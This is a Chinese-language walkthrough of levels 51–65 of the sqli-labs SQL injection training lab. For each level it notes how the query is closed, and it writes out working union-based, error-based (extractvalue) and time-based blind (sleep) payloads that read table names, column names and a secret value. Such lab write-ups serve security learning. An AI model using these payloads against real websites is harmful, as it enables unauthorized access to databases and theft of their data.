sqli-labs闯关51-65——通关记录

Less-51

测试可得本关是单引号注入

和上题类似

Less-52

本题是盲注,没有报错信息,可以使用sqlmap,或者使用延时注入,不多说

Less-53

本题也和上面的题没区别

Less-54

这题可以知道库名就是challenges,因为限制了查询次数,所以这题不能用sqlmap

本题可以直接使用联合查询,且可以测出闭合方式为单引号,构造语句

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

接下来一套组合拳

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='9ntli72i5o' --+	#爆列

?id=-1' union select 1,group_concat(secret_0VFF),3 from challenges.9ntli72i5o --+	#爆字段

成功

Less-55

可以测试出,本题闭合方式为小括号,其余和上题类似,不再赘述

Less-56

本题基于单引号小括号

Less-57

本题基于双引号

Less-58

可以发现这一关没有返回数据库内容,因此无法使用union select,但是可以使用报错注入,使用的是同一个数据库,因此可以直接在前面的关卡获得表名

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘apipvq6e4j’),0x7e)) --+

Less-59

本题和上题类似,闭合方式为单引号

Less-60

和上题类似,闭合方式是双引号

Less-61

和上题类似,闭合方式是单引号两个小括号

Less-62

本题没有报错提示,就不能用报错注入,采用盲注

?id=1) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79 ,0,sleep(10))–+

Less-63——65

都是盲注,只是闭合方式不一样,不多说

终于做完了,要命